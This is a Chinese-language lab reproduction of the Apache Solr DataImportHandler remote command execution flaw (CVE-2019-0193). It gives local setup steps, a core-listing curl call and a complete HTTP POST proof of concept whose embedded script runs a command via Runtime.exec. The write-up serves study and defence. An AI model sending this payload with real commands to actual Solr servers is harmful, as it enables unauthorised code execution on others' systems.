CVE-2019-0193:Apache Solr 遠程命令執行漏洞復現


0x00 漏洞背景

2019年8月1日,Apache Solr官方發布了CVE-2019-0193漏洞預警,漏洞危害評級為嚴重

 

0x01 影響范圍

Apache Solr < 8.2.0

 

0x02 環境搭建

下載地址https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip

在本地解壓,進入solr-7.7.2目錄,執行命令 bin/solr -e dih (前提:java環境)

然后訪問http://localhost:8983/solr即可訪問環境

 

0x03 漏洞利用

首先我們可以通過接口 curl http://127.0.0.1:8983/solr/admin/cores 來獲取所有 core 信息,下面我們構造 payload 需要 name 信息

 在Burp中發送以下POC即可執行命令彈出計算器,下面的 <your_core_name> 需要替換為你獲取到的 core 的 name(共兩處)

POST /solr/<your_core_name>/dataimport HTTP/1.1
Host: 127.0.0.1:8983
Content-Length: 763
User-Agent: Mozilla/5.0
Content-type: application/x-www-form-urlencoded
Connection: close

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=<your_core_name>&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process= java.lang.Runtime.getRuntime();
process.exec("calc");
return row;
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>

執行效果如下:

 


 

如果想了解最新漏洞復現過程,歡迎掃碼關注 Timeline Sec 公眾號!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM